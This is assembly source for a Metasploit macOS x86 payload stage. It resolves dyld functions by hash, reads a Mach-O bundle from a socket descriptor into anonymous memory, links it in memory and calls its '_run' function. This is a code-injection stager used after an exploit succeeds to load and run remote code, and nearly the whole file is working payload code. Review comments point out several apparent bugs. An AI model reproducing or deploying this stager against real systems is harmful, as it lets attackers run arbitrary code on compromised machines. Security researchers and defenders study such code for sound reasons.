GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/osx/x86/include/_inject_bundle.s
;;;
;;; Skip straight to inject_bundle when we assemble this as bin file
;;;
jmp _inject_bundle ; flat-binary entry point (see header comment above); edi = filedes
;;; --------------------------------------------------------------------
;;; Constants
;;; --------------------------------------------------------------------
;; mmap() flag and protection bits (Darwin values), used by .mmap in _inject_bundle
%define MAP_ANON 0x1000 ; anonymous mapping, not backed by a file
%define MAP_PRIVATE 0x0002 ; mapping is private to this process
%define PROT_READ 0x01
%define PROT_WRITE 0x02

;; NSLinkModule() option bits (mach-o/dyld.h)
%define NSLINKMODULE_OPTION_BINDNOW 0x1 ; resolve all undefined symbols at link time
%define NSLINKMODULE_OPTION_PRIVATE 0x2 ; not referenced in this file
%define NSLINKMODULE_OPTION_RETURN_ON_ERROR 0x4 ; return NULL on failure instead of invoking dyld's error handler
;;; --------------------------------------------------------------------
;;; ror13_hash(string symbol_name)
;;;
;;; Compute the 32-bit "ror13" hash for a given symbol name. The hash
;;; value is left in the assembler variable `hash`
;;; --------------------------------------------------------------------
%macro ror13_hash 1
;; Assemble-time hash of the string argument %1. For each character c:
;;   hash = ror32(hash, 13) + c, truncated to 32 bits
;; which is the same function _macho_resolve computes at run time over
;; a symbol name (ror edi, 13 / add edi, eax). The result is left in
;; the assembler variable `hash`; the NUL terminator is not included,
;; matching the run-time loop, which stops before folding the NUL.
%assign hash 0
%assign c 0
%strlen len %1 ; len = number of characters in %1

%assign i 1 ; %substr positions are 1-based
%rep len
%substr c %1 i ; c = i-th character of %1 (one-char string, used as a character constant)
;; (hash >> 13) | (hash << 19) is a 32-bit rotate once masked; the bits of
;; hash << 19 above bit 31 cannot carry into the low dword of the sum.
%assign hash ((((hash >> 13) | (hash << 19)) + c) & 0xFFFFFFFF)
%assign i i + 1
%endrep
%endmacro
;;; --------------------------------------------------------------------
;;; dyld_resolve(uint32_t hash)
;;;
;;; Look up the address of an exported symbol within dyld by "ror13" hash.
;;;
;;; Arguments:
;;; hash - 32-bit "ror13" hash of symbol name
;;; --------------------------------------------------------------------
_dyld_resolve:
;; void *dyld_resolve(uint32_t hash) -- one dword argument on the stack,
;; popped by the callee (ret 4). Forwards to _macho_resolve with a
;; hard-coded image base; eax = symbol address, or 0 if not found.
mov eax, [esp+4] ; hash argument
push eax ; macho_resolve arg 2: hash
;; Fixed address at which dyld is assumed to be mapped. This only holds
;; on 32-bit macOS versions where dyld itself is not relocated; on a
;; system that slides dyld, the lookup walks the wrong memory.
;; NOTE(review): confirm against the target OS version.
push 0x8fe00000 ; macho_resolve arg 1: base
call _macho_resolve ; pops its own 8 bytes of arguments
ret 4 ; discard the hash argument, eax carries the result
;;; --------------------------------------------------------------------
;;; macho_resolve(void* base, uint32_t hash)
;;;
;;; Look up the address of an exported symbol within the given Mach-O
;;; image by "ror13" hash value.
;;;
;;; Arguments:
;;; base - base address of Mach-O image
;;; hash - 32-bit "ror13" hash of symbol name
;;; --------------------------------------------------------------------
_macho_resolve:
;; void *macho_resolve(void *base, uint32_t hash) -- two dword args on
;; the stack, popped by the callee (ret 8). Walks the image's load
;; commands to find __TEXT, __LINKEDIT and LC_SYMTAB, then scans the
;; symbol table for a name whose ror13 hash equals `hash`.
;; Returns eax = symbol address slid to the actual load address, or
;; eax = 0 when no symbol matches (or the image has no load commands).
;;
;; Frame:  [ebp+8]  = base (actual image load address)
;;         [ebp+12] = hash
;;         [ebp-4]  = load commands still to visit (ncmds countdown)
;;         [ebp-8]  = __TEXT vmaddr, i.e. the image's preferred load address
;;         [ebp-12] = address that file offset 0 of __LINKEDIT maps to
;;                    (so symoff/stroff can be added to it directly)
;; Registers: ebx = current load command, ecx = symbol countdown,
;;            edx = current nlist entry, esi = its name, edi = running hash.
;; ebx/esi/edi are callee-saved in the i386 ABI, hence the push/pop.
push ebp
mov ebp, esp
sub esp, byte 12 ; three dword locals; NOT zero-initialised (see .linkedit)
push ebx
push esi
push edi

mov ebx, [ebp+8] ; mach-o image base address
mov eax, [ebx+16] ; mach_header->ncmds
mov [ebp-4], eax ; ncmds

;; sizeof(struct mach_header) == 28 for 32-bit images. Only the low byte
;; of ebx is added to, so a carry out of bl would be lost; this relies
;; on the base having a small low byte (a page-aligned base has 0).
;; NOTE(review): confirm for any caller passing a non-page-aligned base.
add bl, 28 ; Advance ebx to first load command
.loadcmd:
;; Load command loop: [ebx] = cmd, [ebx+4] = cmdsize
xor eax, eax
cmp dword [ebp-4], eax
je .return ; no load commands left: eax == 0 means "not found"

inc eax
cmp [ebx], eax ; cmd == 1 (LC_SEGMENT)?
je .segment
inc eax
cmp [ebx], eax ; cmd == 2 (LC_SYMTAB)?
je .symtab
.next_loadcmd:
;; Advance to the next load command
dec dword [ebp-4]
add ebx, [ebx+4] ; ebx += cmdsize
jmp .loadcmd

.segment:
;; segname starts at [ebx+8]; offset 10 skips the leading "__", so only
;; the next four characters are compared.
;; Look for "__TEXT" segment
cmp [ebx+10], dword 'TEXT'
je .text
;; Look for "__LINKEDIT" segment ("LINK" is enough to identify it)
cmp [ebx+10], dword 'LINK'
je .linkedit

jmp .next_loadcmd
.text:
mov eax, [ebx+24] ; segcmd->vmaddr of __TEXT
mov [ebp-8], eax ; save image preferred load address
jmp .next_loadcmd
.linkedit:
;; We have found the __LINKEDIT segment. Compute the in-memory address
;; corresponding to file offset 0:
;;   linkedit_base = (vmaddr - preferred) + actual - fileoff
;; This uses [ebp-8], so it assumes __TEXT was already seen; if it was
;; not, [ebp-8] still holds whatever was on the stack.
;; NOTE(review): Mach-O images normally list __TEXT first -- confirm.
mov eax, [ebx+24] ; segcmd->vmaddr
sub eax, [ebp-8] ; image preferred load address
add eax, [ebp+8] ; actual image load address
sub eax, [ebx+32] ; segcmd->fileoff
mov [ebp-12], eax ; save linkedit segment base

jmp .next_loadcmd

.symtab:
;; Examine LC_SYMTAB load command (symoff/nsyms/stroff at +8/+12/+16).
;; The symbol table is walked from the last entry down to the first.
mov ecx, [ebx+12] ; ecx = symtab->nsyms
.symbol:
xor eax, eax
cmp ecx, eax
je .return ; every symbol tried, none matched: returns eax == 0
dec ecx

;; Each nlist entry is 12 bytes: n_strx at +0, n_value at +8.
imul edx, ecx, byte 12 ; edx = index into symbol table
add edx, [ebx+8] ; edx += symtab->symoff
add edx, [ebp-12] ; adjust symoff relative to linkedit

mov esi, [edx] ; esi = n_strx, index into string table
add esi, [ebx+16] ; esi += symtab->stroff
add esi, [ebp-12] ; adjust stroff relative to linkedit

;; Hash the NUL-terminated name at esi:
;;   edi = ror32(edi, 13) + c   for each byte c before the NUL
;; (same function as the assemble-time ror13_hash macro).
xor edi, edi
cld ; lodsb must walk forwards
.hash:
xor eax, eax
lodsb ; al = *esi++ (ah is 0 from the xor above)
cmp al, ah ; end of string?
je .compare
ror edi, 13
add edi, eax
jmp .hash

.compare:
cmp edi, [ebp+12] ; hash matches the requested one?
jne .symbol

;; Match: slide n_value from the preferred to the actual load address.
mov eax, [edx+8] ; return symbols[ecx].n_value
sub eax, [ebp-8] ; adjust to actual load address
add eax, [ebp+8]
.return:
pop edi
pop esi
pop ebx
leave
ret 8 ; discard base and hash arguments
;;; --------------------------------------------------------------------
;;; inject_bundle(int filedes)
;;;
;;; Read a Mach-O bundle from the given file descriptor, load and link
;;; it into the currently running process.
;;;
;;; Arguments:
;;; filedes (edi) - file descriptor to read() bundle from
;;; --------------------------------------------------------------------
_inject_bundle:
;; Entered by the jmp at the top of the file, not by call: there is no
;; return address or argument on the stack, and the only input is edi.
;; The routine never returns -- every path ends in the exit syscall at
;; .error, which is also reached after _run() comes back. Callee-saved
;; registers (ebx/esi/edi) are therefore not preserved.
;;
;; Syscall convention used throughout (BSD int 0x80): arguments are
;; pushed right-to-left with one extra "spacer" dword on top, eax holds
;; the syscall number, and CF is set on error (hence the jb after each
;; int 0x80). The pushed arguments are never popped; that is harmless
;; here only because esp is realigned below and the routine never
;; returns.
;;
;; Frame: [ebp-4] = bundle size read from the descriptor
;;        [ebp-8] = mmap'd buffer, later reused for the NSObjectFileImage
;; Registers: esi = filedes, edi = buffer cursor, ecx = bytes remaining
push ebp
mov ebp, esp
sub esp, byte 12

mov esi, edi ; arg0: filedes

.read_size:
;; Read a 4-byte size of bundle to read: read(filedes, &[ebp-4], 4)
xor eax, eax
mov al, 4
push eax ; nbyte
lea edi, [ebp-4]
push edi ; buf
push esi ; s
push eax ; spacer
dec eax ; eax = 3 (SYS_read)
int 0x80
jb .read_error
;; NOTE(review): ecx is not set anywhere in this routine before this
;; compare, so the "zero-read" test depends on whatever ecx holds after
;; the syscall -- confirm against the kernel's register behaviour.
cmp eax, ecx ; A zero-read signals termination
je .read_error
mov ecx, [ebp-4]
xor eax, eax
cmp ecx, eax
je .read_error ; A zero value signals termination

jmp .mmap
.read_error:
jmp .error ; trampoline to the common exit

.mmap:
;; mmap(NULL, size, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE, -1, 0)
xor eax, eax
push eax ; offset
push -1 ; fd (none: anonymous mapping)
push (MAP_ANON | MAP_PRIVATE)
push (PROT_READ | PROT_WRITE)
push ecx ; size
push eax ; addr (NULL: kernel chooses)
push eax ; spacer
mov al, 197 ; SYS_mmap
int 0x80
jb .error
mov edi, eax ; memory buffer
mov [ebp-8], edi

;; read bundle from file descriptor into mmap'd buffer, looping until
;; all ecx bytes have arrived (short reads are handled).
;; NOTE(review): a read() returning 0 (EOF before `size` bytes) is not
;; an error and leaves ecx unchanged, so the loop would spin.
.read_bundle:
xor eax, eax
push ecx ; nbyte
push edi ; buf
push esi ; filedes
push eax ; spacer
mov al, 3 ; SYS_read
int 0x80
jb .error
add edi, eax ; advance cursor by bytes read
sub ecx, eax ; bytes remaining
jnz .read_bundle

mov edi, [ebp-8] ; load original memory buffer

;; Now that we are calling library methods, we need to make sure
;; that esp is 16-byte aligned at the point of the call
;; instruction. So we align the stack here and then just be
;; careful to keep it aligned as we call library functions.
;; Each call below pushes exactly 16 bytes (padding included); the
;; extra hash push is consumed by _dyld_resolve's ret 4 before the
;; indirect call, and the 16 bytes of arguments are left in place.

sub esp, byte 16
and esp, 0xfffffff0

;; load bundle from mmap'd buffer:
;;   NSCreateObjectFileImageFromMemory(addr, size, &objectFileImage)
push byte 0 ; maintain alignment
lea eax, [ebp-8]
push eax ; &objectFileImage (this slot held the buffer pointer; edi keeps a copy)
;; NOTE(review): [ebp+12] lies above this frame and is never written
;; here; as this routine is entered by jmp, its contents come from the
;; caller's stack. The size read from the descriptor is in [ebp-4].
push dword [ebp+12] ; size
push edi ; addr
ror13_hash "_NSCreateObjectFileImageFromMemory"
push dword hash ; assemble-time constant
call _dyld_resolve
call eax
cmp al, 1 ; NSObjectFileImageSuccess (== 1)
jne .error

;; link bundle from object file image:
;;   NSLinkModule(objectFileImage, moduleName, options)
xor eax, eax
push eax ; padding for alignment
mov al, (NSLINKMODULE_OPTION_RETURN_ON_ERROR | NSLINKMODULE_OPTION_BINDNOW)
push eax ; options
;; NOTE(review): push esp stores the pre-push value of esp, i.e. the
;; address of the options dword just pushed, so moduleName points at
;; those bytes rather than at the zero pushed before it -- confirm
;; this is intended.
push esp ; ""
push dword [ebp-8] ; objectFileImage
ror13_hash "_NSLinkModule"
push dword hash
call _dyld_resolve
call eax ; eax = NSModule; the return value is not checked

;; run_symbol = NSLookupSymbolInModule(module, "_run")
;; The string "_run\0" is built on the stack from two pushes.
mov ebx, eax ; module
xor eax, eax
push eax ; "\0\0\0\0"
push 0x6e75725f ; "_run"
mov eax, esp ; eax = &"_run"
push eax ; sym
push ebx ; module

ror13_hash "_NSLookupSymbolInModule"
push dword hash
call _dyld_resolve
call eax

;; NSAddressOfSymbol(run_symbol)
sub esp, 12 ; maintain alignment
push eax
ror13_hash "_NSAddressOfSymbol"
push dword hash
call _dyld_resolve
call eax

;; _run(socket) -- the bundle's entry point receives the same
;; descriptor the bundle was read from. eax is not checked for NULL.
sub esp, 12 ; maintain alignment
push esi
call eax

.error:
;; Exit cleanly: exit(0). Reached on every failure path and after _run
;; returns; no error status is reported to the caller.
xor eax, eax
push eax ; EXIT_SUCCESS
push eax ; spacer
mov al, 1 ; SYS_exit
int 0x80